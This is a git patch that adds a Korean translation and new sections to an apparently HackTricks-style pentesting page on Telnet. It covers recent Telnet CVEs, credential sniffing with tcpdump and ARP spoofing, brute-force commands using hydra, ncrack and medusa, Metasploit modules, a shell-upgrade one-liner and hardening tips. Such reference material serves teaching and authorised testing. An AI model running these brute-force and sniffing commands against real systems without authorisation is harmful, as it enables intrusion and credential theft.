From 3e04ddc7d8225129af1e60f7b203a971b0922e5f Mon Sep 17 00:00:00 2001 From: Translator Date: Sun, 13 Jul 2025 21:25:13 +0000 Subject: [PATCH] Translated ['src/network-services-pentesting/pentesting-telnet.md'] to k --- .../pentesting-telnet.md | 62 ++++++++++++++++++- 1 file changed, 59 insertions(+), 3 deletions(-) diff --git a/src/network-services-pentesting/pentesting-telnet.md b/src/network-services-pentesting/pentesting-telnet.md index 4e958946b..ad2f81950 100644 --- a/src/network-services-pentesting/pentesting-telnet.md +++ b/src/network-services-pentesting/pentesting-telnet.md @@ -27,9 +27,9 @@ nmap -n -sV -Pn --script "*telnet* and safe" -p 23 **이 옵션을 열거하는 것이 가능하다는 것을 알고 있지만, 방법을 모르니 아는 경우 알려주세요.** -### [Brute force](../generic-hacking/brute-force.md#telnet) +### [무차별 대입](../generic-hacking/brute-force.md#telnet) -## Config file +## 구성 파일 ```bash /etc/inetd.conf /etc/xinetd.d/telnet @@ -67,4 +67,60 @@ Note: sourced from https://github.com/carlospolop/legion Command: msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/brocade_enable_login; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_encrypt_overflow; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_ruggedcom; set RHOSTS {IP}; set RPORT 23; run; exit' ``` -{{#include ../banners/hacktricks-training.md}} +### Recent Vulnerabilities (2022-2025) + +* **CVE-2024-45698 – D-Link Wi-Fi 6 routers (DIR-X4860)**: 내장된 Telnet 서비스는 하드코딩된 자격 증명을 수용하고 입력을 정리하지 않아, 포트 23에서 조작된 명령을 통해 루트로 인증되지 않은 원격 RCE를 허용합니다. 펌웨어 ≥ 1.04B05에서 수정됨. +* **CVE-2023-40478 – NETGEAR RAX30**: Telnet CLI `passwd` 명령에서 스택 기반 버퍼 오버플로우가 발생하여 인접한 공격자가 인증을 우회하고 루트로 임의 코드를 실행할 수 있게 합니다. +* **CVE-2022-39028 – GNU inetutils telnetd**: 두 바이트 시퀀스(`0xff 0xf7` / `0xff 0xf8`)가 NULL 포인터 역참조를 유발하여 `telnetd`를 충돌시킬 수 있으며, 여러 번의 충돌 후 지속적인 DoS를 초래합니다. + +취약점 분류 중 이러한 CVE를 염두에 두십시오—대상이 패치되지 않은 펌웨어 또는 레거시 inetutils Telnet 데몬을 실행 중이라면 코드 실행 또는 방해가 되는 DoS로의 직선 경로가 있을 수 있습니다. + +### Sniffing Credentials & Man-in-the-Middle + +Telnet은 자격 증명을 포함한 모든 것을 **명확한 텍스트**로 전송합니다. 자격 증명을 캡처하는 두 가지 빠른 방법: +```bash +# Live capture with tcpdump (print ASCII) +sudo tcpdump -i eth0 -A 'tcp port 23 and not src host $(hostname -I | cut -d" " -f1)' + +# Wireshark display filter +tcp.port == 23 && (telnet.data || telnet.option) +``` +활성 MITM의 경우, ARP 스푸핑(예: `arpspoof`/`ettercap`)을 동일한 스니핑 필터와 결합하여 스위치 네트워크에서 비밀번호를 수집합니다. + +### 자동화된 무차별 대입 / 비밀번호 스프레이링 +```bash +# Hydra (stop at first valid login) +hydra -L users.txt -P rockyou.txt -t 4 -f telnet:// + +# Ncrack (drop to interactive session on success) +ncrack -p 23 --user admin -P common-pass.txt --connection-limit 4 + +# Medusa (parallel hosts) +medusa -M telnet -h targets.txt -U users.txt -P passwords.txt -t 6 -f +``` +대부분의 IoT 봇넷(Mirai 변종)은 여전히 기본 자격 증명 사전으로 포트 23을 스캔합니다. 이러한 논리를 반영하면 약한 장치를 빠르게 식별할 수 있습니다. + +### Exploitation & Post-Exploitation + +Metasploit에는 여러 유용한 모듈이 있습니다: + +* `auxiliary/scanner/telnet/telnet_version` – 배너 및 옵션 열거. +* `auxiliary/scanner/telnet/brute_telnet` – 멀티스레드 브루트포스. +* `auxiliary/scanner/telnet/telnet_encrypt_overflow` – 취약한 Solaris 9/10 Telnet에 대한 RCE (옵션 ENCRYPT 처리). +* `exploit/linux/mips/netgear_telnetenable` – 많은 NETGEAR 라우터에서 조작된 패킷으로 telnet 서비스를 활성화합니다. + +쉘을 얻은 후 **TTY는 일반적으로 멍청하다는 것을 기억하세요**; `python -c 'import pty;pty.spawn("/bin/bash")'`로 업그레이드하거나 [HackTricks TTY tricks](/generic-hacking/reverse-shells/full-ttys.md)를 사용하세요. + +### Hardening & Detection (Blue team corner) + +1. SSH를 선호하고 Telnet 서비스를 완전히 비활성화하세요. +2. Telnet이 필요한 경우 관리 VLAN에만 바인딩하고 ACL을 적용하며 데몬을 TCP 래퍼로 감싸세요 (`/etc/hosts.allow`). +3. 레거시 `telnetd` 구현을 `ssl-telnet` 또는 `telnetd-ssl`로 교체하여 전송 암호화를 추가하되, **이는 데이터 전송 중 보호만 제공하며 비밀번호 추측은 여전히 간단합니다**. +4. 포트 23으로의 아웃바운드 트래픽을 모니터링하세요; 타협은 종종 엄격한 HTTP 이탈 필터를 우회하기 위해 Telnet을 통해 리버스 쉘을 생성합니다. + +## References + +* D-Link Advisory – CVE-2024-45698 Critical Telnet RCE. +* NVD – CVE-2022-39028 inetutils `telnetd` DoS. + +{{#include /banners/hacktricks-training.md}}